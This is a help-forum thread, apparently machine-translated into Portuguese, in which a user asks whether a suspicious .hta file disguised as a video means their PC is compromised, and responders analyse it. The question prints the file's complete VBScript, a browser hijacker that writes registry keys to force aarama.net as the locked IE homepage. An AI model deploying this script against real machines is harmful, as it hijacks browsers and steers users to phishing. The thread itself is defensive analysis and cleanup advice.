help… virus? comprometido? (aarama.net)

3

Ajude-me a identificar se meu computador está comprometido ou não.

Ainda não sei ao certo o que é isso. Ainda estou navegando em alguns arquivos JavaScript (meu nível = iniciante) que encontrei durante minha "pesquisa" ...

A história:

  1. Windows 7 x64 Professional, Eset Smart Security 4.2.71.2, o mais recente Firefox, o mais recente Chrome, o IE 8
  2. Encontrei na pasta de download padrão do Chrome um arquivo adam-liseli-kizi-otele-goturup-sikiyor.avi.hta É um script VB:

    Set shell = CreateObject("WScript.Shell")
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\mirc","http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ" 
    self.Close
    
  3. Segui aarama.net , encontrei um site de phishing (eu acho) parecido com o Google com muito JavaScript que estou tentando entender agora mesmo.

por sdadffdfd 24.03.2011 / 00:21

4 respostas

11

Bem, fazendo algumas pesquisas no nível da rede, posso dizer o seguinte:

  1. O domínio foi registrado há 20 dias.
  2. O registrador está no Luxemburgo, mas o número de telefone está na Dinamarca.
  3. O site parece ser turco.
  4. O proprietário do domínio está se escondendo atrás do PrivacyProtect
  5. O site é hospedado pela CloudFlair em São Francisco.

Tudo parece muito muito desonesto:

  1. É um novo domínio
  2. Os detalhes do registro não são adicionados
  3. Ocultar quem registrou o domínio não é necessariamente ruim, mas alguém nefário faria isso
  4. CloudFlare distribui contas gratuitas com muito pouca verificação.

Uma rápida olhada no javascript e jogando com o site dentro do Links não causou nada muito desagradável, mas ainda não analisei o JS corretamente (é quase meia-noite). Vou ter mais de uma escavação de manhã.

Se você acha que é definitivamente um malware, então uma chamada para CloudFlare será para alertá-los - eles provavelmente irão desligar o site instantaneamente.

Atualizar

Aarama.net mudou-se para uma instalação de hospedagem na Alemanha que é notória por hospedar bots e outros sites suspeitos (your-server.de).

    
por 24.03.2011 / 00:57
8

Eu não falo muito script, mas as intenções deste aqui parecem claras.

Set shell = CreateObject("WScript.Shell")

A primeira linha, não tenho certeza absoluta. No entanto, alguns Googling parecem confirmar minha opinião de que essa é uma linha de abertura bastante padronizada para um script.

O restante das linhas parece estar configurando várias chaves de registro.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\mirc","http://aarama.net/","REG_SZ"

Este adiciona um novo prefixo de URL ao Internet Explorer. Essencialmente, a qualquer momento o IE é solicitado a solicitar um recurso começando em "mirc". e o protocolo não for especificado, ele inserirá " link " na frente do endereço antes de processá-lo. Então, se você digitar "mirc.google.com" na sua barra de endereço, o IE o traduziria para " link ". Isso provavelmente ajuda alguns dos outros scripts no site malicioso (ou malwares baixados) a funcionarem.

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"

Eles adicionam chaves do Registro que normalmente implementam o controle de Diretiva de Grupo no Internet Explorer. Você pode achar que não pode mais mudar sua Home Page do IE através do Painel de Controle.

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ" 

Eles definem " link " para sua página inicial - garantindo que você vá ao site pelo menos uma vez e tenha a oportunidade de cair vítima de qualquer esquema de phishing ou código malicioso pode estar lá. Naturalmente, as chaves anteriores garantirão que você não vá apenas uma vez, já que não é possível alterar a página inicial.

self.Close

Novamente, eu não falo script. Mas eu acho que esse obviamente acaba com isso.

Algumas coisas que você deve fazer com essa informação:

1.) (Demasiado tarde) Não aceda a esse website.

2.) Tenha alguns bons programas antivírus / anti-malware em sua máquina. Minhas recomendações são um Avast! varredura de inicialização, Malwarebytes e SpyBot Search & Destruir. Se possível, use uma máquina separada, boa e descartável para fazer as digitalizações. Ou obtenha um bom LiveCD para as verificações.

3.) Verifique seu registro para os valores criados pelo script. Se eles ainda estiverem lá, faça o backup do seu registro, exclua os valores criados ou altere-os para suas configurações preferidas. Os três primeiros devem ser descartados. Os dois últimos, defina a sua preferência ou "about: blank".

4.) Se você notar qualquer atividade suspeita em seu sistema depois disso, é hora da abordagem de "nuke orbitar". Espero que você tenha bons backups.

    
por 24.03.2011 / 03:57
4

Isso parece tão estranho. Eu sugiro algumas coisas - malwarebytes primeiro - é um bom scanner, e um bloqueado por malware - é eficaz quando funciona. Além disso, procure por processos estranhos no gerenciador de processos e no netstat.

Eu também sugiro aprender a usar, e usar o revelador de rootkit (no caso de rootkits) e o hijackthis para confirmar - os logs deste último são muito úteis ao tentar determinar se houve uma invasão, pois eles fazem algumas interpretações .

    
por 24.03.2011 / 00:47
0

Não sou especialista, mas parece que está tornando esse domínio a página inicial do Internet Explorer. O domínio é vinculado a um phisher do Google.

O objetivo é fazer com que você faça login na sua conta do Google para poder coletar as contas. Eu não dei uma boa olhada no site, mas duvido que faça qualquer outra coisa.

Não importa o que você deve escanear com o Malwarebytes apenas para ter certeza.

    
por 24.03.2011 / 01:14